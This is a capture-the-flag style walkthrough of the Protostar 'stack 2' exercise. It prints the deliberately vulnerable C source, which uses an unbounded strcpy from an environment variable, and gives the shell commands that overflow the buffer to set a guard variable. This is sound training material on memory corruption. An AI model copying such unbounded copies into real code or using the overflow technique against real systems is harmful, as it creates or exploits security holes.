protostar - stack 2
Lets check the file type of our binary,
$ file stack2
stack2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
Lets try running it,
$ ./stack2
stack2: please set the GREENIE environment variable
Lets view the source code for proper understanding,
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
char *variable;
variable = getenv("GREENIE");
if(variable == NULL) {
errx(1, "please set the GREENIE environment variable\n");
}
modified = 0;
strcpy(buffer, variable);
if(modified == 0x0d0a0d0a) {
printf("you have correctly modified the variable\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
To pass this program we need to overwrite the modified
with 0x0d0a0d0a
This challenge is almost similar to the previous one
We need to craft an environment variable GREENIE
which is being stored in variable
variable = getenv("GREENIE");
Lets set an env
variable named GREENIE
$ export GREENIE=AAAABBBBCCCCDDDD
$ ./stack2
Try again, you got 0x00000000
$ echo $GREENIE
AAAABBBBCCCCDDDD
Now we have to overwrite it, but we need to use GREENIE
for it because,
strcpy(buffer, variable);
strcpy
is used to copy the variable
(Data from GREENIE
) into buffer
Since strcpy
can be used to overflow, because this vulnerable functions doesn’t use memory boundaries
We need 64 bytes
of data to overwrite the modified
variable
Lets try to overwrite it with random junk,
$ export GREENIE=$(python -c "print('A'*64+'BBBB')")
$ echo $GREENIE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
$ ./stack2
Try again, you got 0x42424242
Lets exploit it,
$ export GREENIE=$(python -c "print('A'*64+'\x0a\x0d\x0a\x0d')")
$ ./stack2
you have correctly modified the variable
Done! we have completed “stack2”